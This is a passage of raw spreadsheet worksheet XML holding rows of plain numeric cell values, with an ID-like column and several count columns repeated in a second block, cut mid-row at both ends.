        <v>1</v>
      </c>
      <c r="D1039" s="8">
        <v>5</v>
      </c>
      <c r="E1039" s="8">
        <v>5</v>
      </c>
      <c r="F1039" s="8">
        <v>9</v>
      </c>
      <c r="G1039" s="8">
        <v>1</v>
      </c>
      <c r="H1039" s="8">
        <v>46</v>
      </c>
      <c r="K1039" s="7">
        <v>2711</v>
      </c>
      <c r="L1039" s="8">
        <v>25</v>
      </c>
      <c r="M1039" s="8">
        <v>1</v>
      </c>
      <c r="N1039" s="8">
        <v>5</v>
      </c>
      <c r="O1039" s="8">
        <v>5</v>
      </c>
      <c r="P1039" s="8">
        <v>9</v>
      </c>
      <c r="Q1039" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1040" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1040" s="7">
        <v>2715</v>
      </c>
      <c r="B1040" s="8">
        <v>25</v>
      </c>
      <c r="C1040" s="8">
        <v>0</v>
      </c>
      <c r="D1040" s="8">
        <v>0</v>
      </c>
      <c r="E1040" s="8">
        <v>0</v>
      </c>
      <c r="F1040" s="8">
        <v>2</v>
      </c>
      <c r="G1040" s="8">
        <v>2</v>
      </c>
      <c r="H1040" s="8">
        <v>29</v>
      </c>
      <c r="K1040" s="7">
        <v>2715</v>
      </c>
      <c r="L1040" s="8">
        <v>25</v>
      </c>
      <c r="M1040" s="8">
        <v>0</v>
      </c>
      <c r="N1040" s="8">
        <v>0</v>
      </c>
      <c r="O1040" s="8">
        <v>0</v>
      </c>
      <c r="P1040" s="8">
        <v>2</v>
      </c>
      <c r="Q1040" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1041" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1041" s="7">
        <v>2718</v>
      </c>
      <c r="B1041" s="8">
        <v>26</v>
      </c>
      <c r="C1041" s="8">
        <v>1</v>
      </c>
      <c r="D1041" s="8">
        <v>7</v>
      </c>
      <c r="E1041" s="8">
        <v>0</v>
      </c>
      <c r="F1041" s="8">
        <v>0</v>
      </c>
      <c r="G1041" s="8">
        <v>3</v>
      </c>
      <c r="H1041" s="8">
        <v>37</v>
      </c>
      <c r="K1041" s="7">
        <v>2718</v>
      </c>
      <c r="L1041" s="8">
        <v>26</v>
      </c>
      <c r="M1041" s="8">
        <v>1</v>
      </c>
      <c r="N1041" s="8">
        <v>7</v>
      </c>
      <c r="O1041" s="8">
        <v>0</v>
      </c>
      <c r="P1041" s="8">
        <v>0</v>
      </c>
      <c r="Q1041" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1042" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1042" s="7">
        <v>2719</v>
      </c>
      <c r="B1042" s="8">
        <v>26</v>
      </c>
      <c r="C1042" s="8">
        <v>1</v>
      </c>
      <c r="D1042" s="8">
        <v>150</v>
      </c>
      <c r="E1042" s="8">
        <v>315</v>
      </c>
      <c r="F1042" s="8">
        <v>75</v>
      </c>
      <c r="G1042" s="8">
        <v>113</v>
      </c>
      <c r="H1042" s="8">
        <v>680</v>
      </c>
      <c r="K1042" s="7">
        <v>2719</v>
      </c>
      <c r="L1042" s="8">
        <v>26</v>
      </c>
      <c r="M1042" s="8">
        <v>1</v>
      </c>
      <c r="N1042" s="8">
        <v>150</v>
      </c>
      <c r="O1042" s="8">
        <v>315</v>
      </c>
      <c r="P1042" s="8">
        <v>75</v>
      </c>
      <c r="Q1042" s="8">
        <v>113</v>
      </c>
    </row>
    <row r="1043" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1043" s="7">
        <v>2724</v>
      </c>
      <c r="B1043" s="8">
        <v>25</v>
      </c>
      <c r="C1043" s="8">
        <v>2</v>
      </c>
      <c r="D1043" s="8">
        <v>42</v>
      </c>
      <c r="E1043" s="8">
        <v>63</v>
      </c>
      <c r="F1043" s="8">
        <v>8</v>
      </c>
      <c r="G1043" s="8">
        <v>1</v>
      </c>
      <c r="H1043" s="8">
        <v>141</v>
      </c>
      <c r="K1043" s="7">
        <v>2724</v>
      </c>
      <c r="L1043" s="8">
        <v>25</v>
      </c>
      <c r="M1043" s="8">
        <v>2</v>
      </c>
      <c r="N1043" s="8">
        <v>42</v>
      </c>
      <c r="O1043" s="8">
        <v>63</v>
      </c>
      <c r="P1043" s="8">
        <v>8</v>
      </c>
      <c r="Q1043" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1044" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1044" s="7">
        <v>2731</v>
      </c>
      <c r="B1044" s="8">
        <v>25</v>
      </c>
      <c r="C1044" s="8">
        <v>3</v>
      </c>
      <c r="D1044" s="8">
        <v>51</v>
      </c>
      <c r="E1044" s="8">
        <v>351</v>
      </c>
      <c r="F1044" s="8">
        <v>18</v>
      </c>
      <c r="G1044" s="8">
        <v>11</v>
      </c>
      <c r="H1044" s="8">
        <v>459</v>
      </c>
      <c r="K1044" s="7">
        <v>2731</v>
      </c>
      <c r="L1044" s="8">
        <v>25</v>
      </c>
      <c r="M1044" s="8">
        <v>3</v>
      </c>
      <c r="N1044" s="8">
        <v>51</v>
      </c>
      <c r="O1044" s="8">
        <v>351</v>
      </c>
      <c r="P1044" s="8">
        <v>18</v>
      </c>
      <c r="Q1044" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="1045" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1045" s="7">
        <v>2732</v>
      </c>
      <c r="B1045" s="8">
        <v>7</v>
      </c>
      <c r="C1045" s="8">
        <v>2</v>
      </c>
      <c r="D1045" s="8">
        <v>0</v>
      </c>
      <c r="E1045" s="8">
        <v>140</v>
      </c>
      <c r="F1045" s="8">
        <v>30</v>
      </c>
      <c r="G1045" s="8">
        <v>10</v>
      </c>
      <c r="H1045" s="8">
        <v>189</v>
      </c>
      <c r="K1045" s="7">
        <v>2732</v>
      </c>
      <c r="L1045" s="8">
        <v>7</v>
      </c>
      <c r="M1045" s="8">
        <v>2</v>
      </c>
      <c r="N1045" s="8">
        <v>0</v>
      </c>
      <c r="O1045" s="8">
        <v>140</v>
      </c>
      <c r="P1045" s="8">
        <v>30</v>
      </c>
      <c r="Q1045" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1046" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1046" s="7">
        <v>2733</v>
      </c>
      <c r="B1046" s="8">
        <v>7</v>
      </c>
      <c r="C1046" s="8">
        <v>0</v>
      </c>
      <c r="D1046" s="8">
        <v>0</v>
      </c>
      <c r="E1046" s="8">
        <v>0</v>
      </c>
      <c r="F1046" s="8">
        <v>13</v>
      </c>
      <c r="G1046" s="8">
        <v>1</v>
      </c>
      <c r="H1046" s="8">
        <v>21</v>
      </c>
      <c r="K1046" s="7">
        <v>2733</v>
      </c>
      <c r="L1046" s="8">
        <v>7</v>
      </c>
      <c r="M1046" s="8">
        <v>0</v>
      </c>
      <c r="N1046" s="8">
        <v>0</v>
      </c>
      <c r="O1046" s="8">
        <v>0</v>
      </c>
      <c r="P1046" s="8">
        <v>13</v>
      </c>
      <c r="Q1046" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1047" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1047" s="7">
        <v>2734</v>
      </c>
      <c r="B1047" s="8">
        <v>25</v>
      </c>
      <c r="C1047" s="8">
        <v>2</v>
      </c>
      <c r="D1047" s="8">
        <v>150</v>
      </c>
      <c r="E1047" s="8">
        <v>200</v>
      </c>
      <c r="F1047" s="8">
        <v>56</v>
      </c>
      <c r="G1047" s="8">
        <v>52</v>
      </c>
      <c r="H1047" s="8">
        <v>485</v>
      </c>
      <c r="K1047" s="7">
        <v>2734</v>
      </c>
      <c r="L1047" s="8">
        <v>25</v>
      </c>
      <c r="M1047" s="8">
        <v>2</v>
      </c>
      <c r="N1047" s="8">
        <v>150</v>
      </c>
      <c r="O1047" s="8">
        <v>200</v>
      </c>
      <c r="P1047" s="8">
        <v>56</v>
      </c>
      <c r="Q1047" s="8">
        <v>52</v>
      </c>
    </row>
    <row r="1048" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1048" s="7">
        <v>2735</v>
      </c>
      <c r="B1048" s="8">
        <v>26</v>
      </c>
      <c r="C1048" s="8">
        <v>0</v>
      </c>
      <c r="D1048" s="8">
        <v>10</v>
      </c>
      <c r="E1048" s="8">
        <v>10</v>
      </c>
      <c r="F1048" s="8">
        <v>7</v>
      </c>
      <c r="G1048" s="8">
        <v>3</v>
      </c>
      <c r="H1048" s="8">
        <v>56</v>
      </c>
      <c r="K1048" s="7">
        <v>2735</v>
      </c>
      <c r="L1048" s="8">
        <v>26</v>
      </c>
      <c r="M1048" s="8">
        <v>0</v>
      </c>
      <c r="N1048" s="8">
        <v>10</v>
      </c>
      <c r="O1048" s="8">
        <v>10</v>
      </c>
      <c r="P1048" s="8">
        <v>7</v>
      </c>
      <c r="Q1048" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1049" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1049" s="7">
        <v>2736</v>
      </c>
      <c r="B1049" s="8">
        <v>0</v>
      </c>
      <c r="C1049" s="8">
        <v>0</v>
      </c>
      <c r="D1049" s="8">
        <v>8</v>
      </c>
      <c r="E1049" s="8">
        <v>5</v>
      </c>
      <c r="F1049" s="8">
        <v>0</v>
      </c>
      <c r="G1049" s="8">
        <v>2</v>
      </c>
      <c r="H1049" s="8">
        <v>15</v>
      </c>
      <c r="K1049" s="7">
        <v>2736</v>
      </c>
      <c r="L1049" s="8">
        <v>0</v>
      </c>
      <c r="M1049" s="8">
        <v>0</v>
      </c>
      <c r="N1049" s="8">
        <v>8</v>
      </c>
      <c r="O1049" s="8">
        <v>5</v>
      </c>
      <c r="P1049" s="8">
        <v>0</v>
      </c>
      <c r="Q1049" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1050" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1050" s="7">
        <v>2737</v>
      </c>
      <c r="B1050" s="8">
        <v>22</v>
      </c>
      <c r="C1050" s="8">
        <v>2</v>
      </c>
      <c r="D1050" s="8">
        <v>0</v>
      </c>
      <c r="E1050" s="8">
        <v>0</v>
      </c>
      <c r="F1050" s="8">
        <v>30</v>
      </c>
      <c r="G1050" s="8">
        <v>105</v>
      </c>
      <c r="H1050" s="8">
        <v>159</v>
      </c>
      <c r="K1050" s="7">
        <v>2737</v>
      </c>
      <c r="L1050" s="8">
        <v>22</v>
      </c>
      <c r="M1050" s="8">
        <v>2</v>
      </c>
      <c r="N1050" s="8">
        <v>0</v>
      </c>
      <c r="O1050" s="8">
        <v>0</v>
      </c>
      <c r="P1050" s="8">
        <v>30</v>
      </c>
      <c r="Q1050" s="8">
        <v>105</v>
      </c>
    </row>
    <row r="1051" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1051" s="7">
        <v>2738</v>
      </c>
      <c r="B1051" s="8">
        <v>6</v>
      </c>
      <c r="C1051" s="8">
        <v>0</v>
      </c>
      <c r="D1051" s="8">
        <v>0</v>
      </c>
      <c r="E1051" s="8">
        <v>0</v>
      </c>
      <c r="F1051" s="8">
        <v>6</v>
      </c>
      <c r="G1051" s="8">
        <v>2</v>
      </c>
      <c r="H1051" s="8">
        <v>14</v>
      </c>
      <c r="K1051" s="7">
        <v>2738</v>
      </c>
      <c r="L1051" s="8">
        <v>6</v>
      </c>
      <c r="M1051" s="8">
        <v>0</v>
      </c>
      <c r="N1051" s="8">
        <v>0</v>
      </c>
      <c r="O1051" s="8">
        <v>0</v>
      </c>
      <c r="P1051" s="8">
        <v>6</v>
      </c>
      <c r="Q1051" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1052" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1052" s="7">
        <v>2740</v>
      </c>
      <c r="B1052" s="8">
        <v>26</v>
      </c>
      <c r="C1052" s="8">
        <v>1</v>
      </c>
      <c r="D1052" s="8">
        <v>7</v>
      </c>
      <c r="E1052" s="8">
        <v>8</v>
      </c>
      <c r="F1052" s="8">
        <v>14</v>
      </c>
      <c r="G1052" s="8">
        <v>16</v>
      </c>
      <c r="H1052" s="8">
        <v>72</v>
      </c>
      <c r="K1052" s="7">
        <v>2740</v>
      </c>
      <c r="L1052" s="8">
        <v>26</v>
      </c>
      <c r="M1052" s="8">
        <v>1</v>
      </c>
      <c r="N1052" s="8">
        <v>7</v>
      </c>
      <c r="O1052" s="8">
        <v>8</v>
      </c>
      <c r="P1052" s="8">
        <v>14</v>
      </c>
      <c r="Q1052" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="1053" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1053" s="7">
        <v>2742</v>
      </c>
      <c r="B1053" s="8">
        <v>6</v>
      </c>
      <c r="C1053" s="8">
        <v>3</v>
      </c>
      <c r="D1053" s="8">
        <v>825</v>
      </c>
      <c r="E1053" s="8">
        <v>48</v>
      </c>
      <c r="F1053" s="8">
        <v>240</v>
      </c>
      <c r="G1053" s="8">
        <v>34</v>
      </c>
      <c r="H1053" s="8">
        <v>1156</v>
      </c>
      <c r="K1053" s="7">
        <v>2742</v>
      </c>
      <c r="L1053" s="8">
        <v>6</v>
      </c>
      <c r="M1053" s="8">
        <v>3</v>
      </c>
      <c r="N1053" s="8">
        <v>825</v>
      </c>
      <c r="O1053" s="8">
        <v>48</v>
      </c>
      <c r="P1053" s="8">
        <v>240</v>
      </c>
      <c r="Q1053" s="8">
        <v>34</v>
      </c>
    </row>
    <row r="1054" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1054" s="7">
        <v>2746</v>
      </c>
      <c r="B1054" s="8">
        <v>24</v>
      </c>
      <c r="C1054" s="8">
        <v>1</v>
      </c>
      <c r="D1054" s="8">
        <v>12</v>
      </c>
      <c r="E1054" s="8">
        <v>0</v>
      </c>
      <c r="F1054" s="8">
        <v>12</v>
      </c>
      <c r="G1054" s="8">
        <v>0</v>
      </c>
      <c r="H1054" s="8">
        <v>49</v>
      </c>
      <c r="K1054" s="7">
        <v>2746</v>
      </c>
      <c r="L1054" s="8">
        <v>24</v>
      </c>
      <c r="M1054" s="8">
        <v>1</v>
      </c>
      <c r="N1054" s="8">
        <v>12</v>
      </c>
      <c r="O1054" s="8">
        <v>0</v>
      </c>
      <c r="P1054" s="8">
        <v>12</v>
      </c>
      <c r="Q1054" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1055" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1055" s="7">
        <v>2747</v>
      </c>
      <c r="B1055" s="8">
        <v>0</v>
      </c>
      <c r="C1055" s="8">
        <v>0</v>
      </c>
      <c r="D1055" s="8">
        <v>0</v>
      </c>
      <c r="E1055" s="8">
        <v>0</v>
      </c>
      <c r="F1055" s="8">
        <v>9</v>
      </c>
      <c r="G1055" s="8">
        <v>5</v>
      </c>
      <c r="H1055" s="8">
        <v>14</v>
      </c>
      <c r="K1055" s="7">
        <v>2747</v>
      </c>
      <c r="L1055" s="8">
        <v>0</v>
      </c>
      <c r="M1055" s="8">
        <v>0</v>
      </c>
      <c r="N1055" s="8">
        <v>0</v>
      </c>
      <c r="O1055" s="8">
        <v>0</v>
      </c>
      <c r="P1055" s="8">
        <v>9</v>
      </c>
      <c r="Q1055" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1056" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1056" s="7">
        <v>2750</v>
      </c>
      <c r="B1056" s="8">
        <v>8</v>
      </c>
      <c r="C1056" s="8">
        <v>1</v>
      </c>
      <c r="D1056" s="8">
        <v>0</v>
      </c>
      <c r="E1056" s="8">
        <v>0</v>
      </c>
      <c r="F1056" s="8">
        <v>3</v>
      </c>
      <c r="G1056" s="8">
        <v>5</v>
      </c>
      <c r="H1056" s="8">
        <v>17</v>
      </c>
      <c r="K1056" s="7">
        <v>2750</v>
      </c>
      <c r="L1056" s="8">
        <v>8</v>
      </c>
      <c r="M1056" s="8">
        <v>1</v>
      </c>
      <c r="N1056" s="8">
        <v>0</v>
      </c>
      <c r="O1056" s="8">
        <v>0</v>
      </c>
      <c r="P1056" s="8">
        <v>3</v>
      </c>
      <c r="Q1056" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1057" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1057" s="7">
        <v>2753</v>
      </c>
      <c r="B1057" s="8">
        <v>16</v>
      </c>
      <c r="C1057" s="8">
        <v>1</v>
      </c>
      <c r="D1057" s="8">
        <v>0</v>
      </c>
      <c r="E1057" s="8">
        <v>0</v>
      </c>
      <c r="F1057" s="8">
        <v>0</v>
      </c>
      <c r="G1057" s="8">
        <v>4</v>
      </c>
      <c r="H1057" s="8">
        <v>21</v>
      </c>
      <c r="K1057" s="7">
        <v>2753</v>
      </c>
      <c r="L1057" s="8">
        <v>16</v>
      </c>
      <c r="M1057" s="8">
        <v>1</v>
      </c>
      <c r="N1057" s="8">
        <v>0</v>
      </c>
      <c r="O1057" s="8">
        <v>0</v>
      </c>
      <c r="P1057" s="8">
        <v>0</v>
      </c>
      <c r="Q1057" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1058" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1058" s="7">
        <v>2755</v>
      </c>
      <c r="B1058" s="8">
        <v>32</v>
      </c>
      <c r="C1058" s="8">
        <v>1</v>
      </c>
      <c r="D1058" s="8">
        <v>82</v>
      </c>
      <c r="E1058" s="8">
        <v>343</v>
      </c>
      <c r="F1058" s="8">
        <v>32</v>
      </c>
      <c r="G1058" s="8">
        <v>154</v>
      </c>
      <c r="H1058" s="8">
        <v>644</v>
      </c>
      <c r="K1058" s="7">
        <v>2755</v>
      </c>
      <c r="L1058" s="8">
        <v>32</v>
      </c>
      <c r="M1058" s="8">
        <v>1</v>
      </c>
      <c r="N1058" s="8">
        <v>82</v>
      </c>
      <c r="O1058" s="8">
        <v>343</v>
      </c>
      <c r="P1058" s="8">
        <v>32</v>
      </c>
      <c r="Q1058" s="8">
        <v>154</v>
      </c>
    </row>
    <row r="1059" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1059" s="7">
        <v>2756</v>
      </c>
      <c r="B1059" s="8">
        <v>30</v>
      </c>
      <c r="C1059" s="8">
        <v>1</v>
      </c>
      <c r="D1059" s="8">
        <v>0</v>
      </c>
      <c r="E1059" s="8">
        <v>0</v>
      </c>
      <c r="F1059" s="8">
        <v>14</v>
      </c>
      <c r="G1059" s="8">
        <v>1</v>
      </c>
      <c r="H1059" s="8">
        <v>46</v>
      </c>
      <c r="K1059" s="7">
        <v>2756</v>
      </c>
      <c r="L1059" s="8">
        <v>30</v>
      </c>
      <c r="M1059" s="8">
        <v>1</v>
      </c>
      <c r="N1059" s="8">
        <v>0</v>
      </c>
      <c r="O1059" s="8">
        <v>0</v>
      </c>
      <c r="P1059" s="8">
        <v>14</v>
      </c>
      <c r="Q1059" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1060" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1060" s="7">
        <v>2759</v>
      </c>
      <c r="B1060" s="8">
        <v>25</v>
      </c>
      <c r="C1060" s="8">
        <v>1</v>
      </c>
      <c r="D1060" s="8">
        <v>56</v>
      </c>
      <c r="E1060" s="8">
        <v>75</v>
      </c>
      <c r="F1060" s="8">
        <v>13</v>
      </c>
      <c r="G1060" s="8">
        <v>20</v>
      </c>
      <c r="H1060" s="8">
        <v>190</v>
      </c>
      <c r="K1060" s="7">
        <v>2759</v>
      </c>
      <c r="L1060" s="8">
        <v>25</v>
      </c>
      <c r="M1060" s="8">
        <v>1</v>
      </c>
      <c r="N1060" s="8">
        <v>56</v>
      </c>
      <c r="O1060" s="8">
        <v>75</v>
      </c>
      <c r="P1060" s="8">
        <v>13</v>
      </c>
      <c r="Q1060" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="1061" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1061" s="7">
        <v>2760</v>
      </c>
      <c r="B1061" s="8">
        <v>25</v>
      </c>
      <c r="C1061" s="8">
        <v>1</v>
      </c>
      <c r="D1061" s="8">
        <v>2</v>
      </c>
      <c r="E1061" s="8">
        <v>4</v>
      </c>
      <c r="F1061" s="8">
        <v>2</v>
      </c>
      <c r="G1061" s="8">
        <v>3</v>
      </c>
      <c r="H1061" s="8">
        <v>37</v>
      </c>
      <c r="K1061" s="7">
        <v>2760</v>
      </c>
      <c r="L1061" s="8">
        <v>25</v>
      </c>
      <c r="M1061" s="8">
        <v>1</v>
      </c>
      <c r="N1061" s="8">
        <v>2</v>
      </c>
      <c r="O1061" s="8">
        <v>4</v>
      </c>
      <c r="P1061" s="8">
        <v>2</v>
      </c>
      <c r="Q1061" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1062" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1062" s="7">
        <v>2761</v>
      </c>
      <c r="B1062" s="8">
        <v>25</v>
      </c>
      <c r="C1062" s="8">
        <v>0</v>
      </c>
      <c r="D1062" s="8">
        <v>0</v>
      </c>
      <c r="E1062" s="8">
        <v>0</v>
      </c>
      <c r="F1062" s="8">
        <v>4</v>
      </c>
      <c r="G1062" s="8">
        <v>2</v>
      </c>
      <c r="H1062" s="8">
        <v>31</v>
      </c>
      <c r="K1062" s="7">
        <v>2761</v>
      </c>
      <c r="L1062" s="8">
        <v>25</v>
      </c>
      <c r="M1062" s="8">
        <v>0</v>
      </c>
      <c r="N1062" s="8">
        <v>0</v>
      </c>
      <c r="O1062" s="8">
        <v>0</v>
      </c>
      <c r="P1062" s="8">
        <v>4</v>
      </c>
      <c r="Q1062" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1063" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1063" s="7">
        <v>2762</v>
      </c>
      <c r="B1063" s="8">
        <v>26</v>
      </c>
      <c r="C1063" s="8">
        <v>1</v>
      </c>
      <c r="D1063" s="8">
        <v>2</v>
      </c>
      <c r="E1063" s="8">
        <v>1</v>
      </c>
      <c r="F1063" s="8">
        <v>9</v>
      </c>
      <c r="G1063" s="8">
        <v>3</v>
      </c>
      <c r="H1063" s="8">
        <v>42</v>
      </c>
      <c r="K1063" s="7">
        <v>2762</v>
      </c>
      <c r="L1063" s="8">
        <v>26</v>
      </c>
      <c r="M1063" s="8">
        <v>1</v>
      </c>
      <c r="N1063" s="8">
        <v>2</v>
      </c>
      <c r="O1063" s="8">
        <v>1</v>
      </c>
      <c r="P1063" s="8">
        <v>9</v>
      </c>
      <c r="Q1063" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1064" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1064" s="7">
        <v>2763</v>
      </c>
      <c r="B1064" s="8">
        <v>0</v>
      </c>
      <c r="C1064" s="8">
        <v>0</v>
      </c>
      <c r="D1064" s="8">
        <v>10</v>
      </c>
      <c r="E1064" s="8">
        <v>10</v>
      </c>
      <c r="F1064" s="8">
        <v>5</v>
      </c>
      <c r="G1064" s="8">
        <v>4</v>
      </c>
      <c r="H1064" s="8">
        <v>29</v>
      </c>
      <c r="K1064" s="7">
        <v>2763</v>
      </c>
      <c r="L1064" s="8">
        <v>0</v>
      </c>
      <c r="M1064" s="8">
        <v>0</v>
      </c>
      <c r="N1064" s="8">
        <v>10</v>
      </c>
      <c r="O1064" s="8">
        <v>10</v>
      </c>
      <c r="P1064" s="8">
        <v>5</v>
      </c>
      <c r="Q1064" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1065" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1065" s="7">
        <v>2769</v>
      </c>
      <c r="B1065" s="8">
        <v>26</v>
      </c>
      <c r="C1065" s="8">
        <v>1</v>
      </c>
      <c r="D1065" s="8">
        <v>0</v>
      </c>
      <c r="E1065" s="8">
        <v>0</v>
      </c>
      <c r="F1065" s="8">
        <v>32</v>
      </c>
      <c r="G1065" s="8">
        <v>222</v>
      </c>
      <c r="H1065" s="8">
        <v>281</v>
      </c>
      <c r="K1065" s="7">
        <v>2769</v>
      </c>
      <c r="L1065" s="8">
        <v>26</v>
      </c>
      <c r="M1065" s="8">
        <v>1</v>
      </c>
      <c r="N1065" s="8">
        <v>0</v>
      </c>
      <c r="O1065" s="8">
        <v>0</v>
      </c>
      <c r="P1065" s="8">
        <v>32</v>
      </c>
      <c r="Q1065" s="8">
        <v>222</v>
      </c>
    </row>
    <row r="1066" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1066" s="7">
        <v>2772</v>
      </c>
      <c r="B1066" s="8">
        <v>26</v>
      </c>
      <c r="C1066" s="8">
        <v>0</v>
      </c>
      <c r="D1066" s="8">
        <v>6</v>
      </c>
      <c r="E1066" s="8">
        <v>0</v>
      </c>
      <c r="F1066" s="8">
        <v>3</v>
      </c>
      <c r="G1066" s="8">
        <v>1</v>
      </c>
      <c r="H1066" s="8">
        <v>36</v>
      </c>
      <c r="K1066" s="7">
        <v>2772</v>
      </c>
      <c r="L1066" s="8">
        <v>26</v>
      </c>
      <c r="M1066" s="8">
        <v>0</v>
      </c>
      <c r="N1066" s="8">
        <v>6</v>
      </c>
      <c r="O1066" s="8">
        <v>0</v>
      </c>
      <c r="P1066" s="8">
        <v>3</v>
      </c>
      <c r="Q1066" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1067" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1067" s="7">
        <v>2773</v>
      </c>
      <c r="B1067" s="8">
        <v>28</v>
      </c>
      <c r="C1067" s="8">
        <v>6</v>
      </c>
      <c r="D1067" s="8">
        <v>4</v>
      </c>
      <c r="E1067" s="8">
        <v>4</v>
      </c>
      <c r="F1067" s="8">
        <v>12</v>
      </c>
      <c r="G1067" s="8">
        <v>8</v>
      </c>
      <c r="H1067" s="8">
        <v>62</v>
      </c>
      <c r="K1067" s="7">
        <v>2773</v>
      </c>
      <c r="L1067" s="8">
        <v>28</v>
      </c>
      <c r="M1067" s="8">
        <v>6</v>
      </c>
      <c r="N1067" s="8">
        <v>4</v>
      </c>
      <c r="O1067" s="8">
        <v>4</v>
      </c>
      <c r="P1067" s="8">
        <v>12</v>
      </c>
      <c r="Q1067" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1068" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1068" s="7">
        <v>2774</v>
      </c>
      <c r="B1068" s="8">
        <v>26</v>
      </c>
      <c r="C1068" s="8">
        <v>1</v>
      </c>
      <c r="D1068" s="8">
        <v>5</v>
      </c>
      <c r="E1068" s="8">
        <v>15</v>
      </c>
      <c r="F1068" s="8">
        <v>2</v>
      </c>
      <c r="G1068" s="8">
        <v>1</v>
      </c>
      <c r="H1068" s="8">
        <v>50</v>
      </c>
      <c r="K1068" s="7">
        <v>2774</v>
      </c>
      <c r="L1068" s="8">
        <v>26</v>
      </c>
      <c r="M1068" s="8">
        <v>1</v>
      </c>
      <c r="N1068" s="8">
        <v>5</v>
      </c>
      <c r="O1068" s="8">
        <v>15</v>
      </c>
      <c r="P1068" s="8">
        <v>2</v>
      </c>
      <c r="Q1068" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1069" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1069" s="7">
        <v>2776</v>
      </c>
      <c r="B1069" s="8">
        <v>25</v>
      </c>
      <c r="C1069" s="8">
        <v>1</v>
      </c>
      <c r="D1069" s="8">
        <v>14</v>
      </c>
      <c r="E1069" s="8">
        <v>10</v>
      </c>
      <c r="F1069" s="8">
        <v>6</v>
      </c>
      <c r="G1069" s="8">
        <v>5</v>
      </c>
      <c r="H1069" s="8">
        <v>61</v>
      </c>
      <c r="K1069" s="7">
        <v>2776</v>
      </c>
      <c r="L1069" s="8">
        <v>25</v>
      </c>
      <c r="M1069" s="8">
        <v>1</v>
      </c>
      <c r="N1069" s="8">
        <v>14</v>
      </c>
      <c r="O1069" s="8">
        <v>10</v>
      </c>
      <c r="P1069" s="8">
        <v>6</v>
      </c>
      <c r="Q1069" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1070" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1070" s="7">
        <v>2777</v>
      </c>
      <c r="B1070" s="8">
        <v>25</v>
      </c>
      <c r="C1070" s="8">
        <v>1</v>
      </c>
      <c r="D1070" s="8">
        <v>20</v>
      </c>
      <c r="E1070" s="8">
        <v>0</v>
      </c>
      <c r="F1070" s="8">
        <v>2</v>
      </c>
      <c r="G1070" s="8">
        <v>10</v>
      </c>
      <c r="H1070" s="8">
        <v>58</v>
      </c>
      <c r="K1070" s="7">
        <v>2777</v>
      </c>
      <c r="L1070" s="8">
        <v>25</v>
      </c>
      <c r="M1070" s="8">
        <v>1</v>
      </c>
      <c r="N1070" s="8">
        <v>20</v>
      </c>
      <c r="O1070" s="8">
        <v>0</v>
      </c>
      <c r="P1070" s="8">
        <v>2</v>
      </c>
      <c r="Q1070" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1071" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1071" s="7">
        <v>2778</v>
      </c>
      <c r="B1071" s="8">
        <v>0</v>
      </c>
      <c r="C1071" s="8">
        <v>0</v>
      </c>
      <c r="D1071" s="8">
        <v>0</v>
      </c>
      <c r="E1071" s="8">
        <v>0</v>
      </c>
      <c r="F1071" s="8">
        <v>13</v>
      </c>
      <c r="G1071" s="8">
        <v>2</v>
      </c>
      <c r="H1071" s="8">
        <v>15</v>
      </c>
      <c r="K1071" s="7">
        <v>2778</v>
      </c>
      <c r="L1071" s="8">
        <v>0</v>
      </c>
      <c r="M1071" s="8">
        <v>0</v>
      </c>
      <c r="N1071" s="8">
        <v>0</v>
      </c>
      <c r="O1071" s="8">
        <v>0</v>
      </c>
      <c r="P1071" s="8">
